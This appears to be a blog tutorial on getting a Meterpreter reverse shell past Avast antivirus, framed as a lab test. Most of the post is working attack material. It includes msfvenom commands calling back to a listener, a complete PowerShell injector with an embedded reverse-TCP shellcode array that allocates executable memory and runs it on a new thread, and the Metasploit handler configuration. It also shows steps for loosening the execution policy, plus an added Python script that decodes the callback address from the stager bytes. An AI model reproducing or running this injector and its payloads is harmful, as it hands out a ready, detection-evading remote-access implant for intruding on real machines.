Bypassing Avast Antivirus: Testing and Executing Undetected Payloads


In 2020 malware is everywhere, and antivirus software is the main line of defence most devices have against it. It is tempting to assume that with an antivirus installed, malware, adware and viruses in general cannot reach the device at all. This post tests that assumption: can we get a payload to run on a machine protected by Avast without Avast detecting it?

This is a lab test against the latest version of Avast available at the time of writing. First I generate a plain Meterpreter executable with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe
Then I upload it to VirusTotal, which gives the result shown in the screenshot.

(screenshot: VirusTotal results for test.exe)

Our shell is detected by nearly every engine. Next we run it on a Windows machine with Avast installed to confirm that Avast catches it too.

(screenshot: Avast detecting test.exe)

As expected, Avast flags the executable. So instead of handing Avast a PE file with a well-known signature, we build the payload as a PowerShell script (.ps1): the raw shellcode is wrapped in a small injector that allocates executable memory, copies the bytes in and starts them on a new thread.

Generate the shellcode in PowerShell byte-array format with one of the commands below and paste the byte list into the $sc line of the script. The architecture has to match the PowerShell process that will run the script: 64-bit powershell.exe (the default on 64-bit Windows) needs the x64 payload, and a 32-bit stager started in a 64-bit process will crash it.
Payload for 32-bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Payload for 64-bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell

script code (save it as avtest.ps1; the original had a typo, -p assthru, in the Add-Type call, fixed below):

# P/Invoke signatures for the three Win32 calls the injector needs.
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

# Compile the signatures into a type that is called as $winFunc::Name(...).
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

# Stray type literal left over from the original script; it only prints the Byte[] type row seen in the output below.
[Byte[]];
# Stager bytes from msfvenom -f powershell. These are the 32-bit stager for 192.168.1.7:4444,
# so they must be run from a 32-bit powershell.exe; paste the x64 output here for 64-bit PowerShell.
[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;

# Allocate at least one page: MEM_COMMIT|MEM_RESERVE (0x3000) with PAGE_EXECUTE_READWRITE (0x40).
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

# Copy the stager into the buffer one byte at a time. Each memset returns the destination pointer,
# which PowerShell echoes; that is the column of numbers seen when the script runs.
# ToInt64 works in both 32- and 64-bit PowerShell (ToInt32 throws once the buffer sits above 2 GB).
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt64()+$i), $sc[$i], 1)};

# Start the stager on a new thread and keep the host process alive so the session survives.
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
Now we upload the script to VirusTotal again:

(screenshot: VirusTotal results for avtest.ps1)


Avast does not flag the script, although 6 other engines do. Next we scan it with Avast itself, with the file already sitting on the Windows machine.

(screenshot: Avast scan of avtest.ps1)

The file is not flagged as a virus or threat. Next we run the script in PowerShell; before that, start the Metasploit handler for the payload:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp      # for the 32-bit payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp  # for the 64-bit payload (use one or the other)
msf6 exploit(multi/handler) > set lhost 192.168.1.7   # the LHOST you gave msfvenom
lhost => 192.168.1.7
msf6 exploit(multi/handler) > set lport 4444          # must match the LPORT you gave msfvenom; it is baked into the shellcode
lport => 4444
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.7      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.7:4444
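The handler only receives the session if its LHOST and LPORT are the ones msfvenom baked into the stager; when they differ nothing useful is printed on the target, the stager thread just fails to connect, retries a few times and then calls ExitProcess, taking the PowerShell host with it. The following Python snippet is an added example, not part of the original post: it pulls the 0x.. tokens out of the [Byte[]] line of the script and recovers the address from the stager's socket-address setup (x86: push <ip>; push <AF_INET, port>; x64: a single mov r12, imm64 holding the sockaddr_in), so the $sc array above can be checked against the handler before anything is run on the target. The x86 excerpt is copied from the $sc array above; the x64 excerpt, and the port 7788 encoded in it, are constructed for the check.

```python
"""Recover LHOST/LPORT from msfvenom reverse_tcp stager bytes embedded in a
PowerShell [Byte[]] literal and compare them with the multi/handler settings."""
import re
import socket
import struct

# Excerpt of the page's $sc array (x86 meterpreter/reverse_tcp): the bytes
# around the two pushes that build the sockaddr_in.
PS_X86_EXCERPT = "[Byte[]] $sc = 0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6;"

# Constructed x64 excerpt (not from the page): the x64 stager loads the whole
# sockaddr_in into r12 with one 'mov r12, imm64' (opcode 49 bc). This one
# encodes 192.168.1.7:7788 so the mismatch check below has something to catch.
PS_X64_EXCERPT = "[Byte[]] $sc = 0x49,0xbc,0x2,0x0,0x1e,0x6c,0xc0,0xa8,0x1,0x7,0x41,0x54;"

# x86 stager: push <ip, 4 raw bytes> ; push <AF_INET=2 (0x02 0x00), port big-endian>
X86_SOCKADDR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)
# x64 stager: mov r12, imm64 -> bytes 49 bc, then {AF_INET, port, ip} in memory order
X64_SOCKADDR = re.compile(rb"\x49\xbc\x02\x00(.{2})(.{4})", re.DOTALL)


def parse_ps_bytes(text):
    """Pull the 0x.. tokens out of a PowerShell [Byte[]] $name = ... literal."""
    m = re.search(r"\[Byte\[\]\]\s*\$\w+\s*=\s*([^;]+)", text)
    if not m:
        raise ValueError("no [Byte[]] literal found")
    return bytes(int(tok, 16) for tok in re.findall(r"0x[0-9a-fA-F]{1,2}", m.group(1)))


def find_reverse_tcp_target(sc):
    """Return (arch, lhost, lport) found in the stager bytes, or None."""
    m = X86_SOCKADDR.search(sc)
    if m:
        ip_raw, port_raw = m.group(1), m.group(2)
        return "x86", socket.inet_ntoa(ip_raw), struct.unpack(">H", port_raw)[0]
    m = X64_SOCKADDR.search(sc)
    if m:
        port_raw, ip_raw = m.group(1), m.group(2)
        return "x64", socket.inet_ntoa(ip_raw), struct.unpack(">H", port_raw)[0]
    return None


def handler_matches(sc, lhost, lport):
    """True when the handler's LHOST/LPORT agree with what the stager will dial."""
    found = find_reverse_tcp_target(sc)
    return found is not None and found[1] == lhost and found[2] == lport


if __name__ == "__main__":
    for label, text in (("page x86", PS_X86_EXCERPT), ("constructed x64", PS_X64_EXCERPT)):
        sc = parse_ps_bytes(text)
        print(label, find_reverse_tcp_target(sc),
              "handler 192.168.1.7:4444 ok:", handler_matches(sc, "192.168.1.7", 4444))
```

Run it against the whole avtest.ps1 text rather than the excerpt and it reports the same 192.168.1.7:4444 that the msfvenom command was given; a handler on any other port would never see the session.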

Next we will execute the payload in windows as below:

(screenshot: PowerShell refusing to run avtest.ps1)

The script did not run, but that is PowerShell's execution policy refusing an unsigned script, not Avast. We relax the policy for the current user so the script can run. The execution policy is a guard against accidentally running scripts, not a security boundary: changing it for CurrentUser needs no elevation, and the same effect is available per invocation through the -ExecutionPolicy parameter of powershell.exe.

Do it according to the command below:

PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help
topic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Unrestricted

With the policy changed, we run the payload again:


C:\WINDOWS\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\
PS C:\Users\User\Desktop> .\avtest.ps1

Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"): R

IsPublic IsSerial Name                                     BaseType
-------- -------- ----                                     --------
True     True     Byte[]                                   System.Array
447807488
447807489
447807490
447807491
447807492
447807493
447807494
447807495
447807496
447807497
447807498
447807499
447807500
447807501
447807502
447807503
447807504
447807505
447807506
.................
If the addresses keep scrolling and the PowerShell window does not hang (the stager thread is running and the script is sitting in its sleep loop), the injection worked and the Meterpreter session opens in the handler.


That is as far as this walkthrough goes; try it in your own lab, and if you run into problems, please leave a comment below.
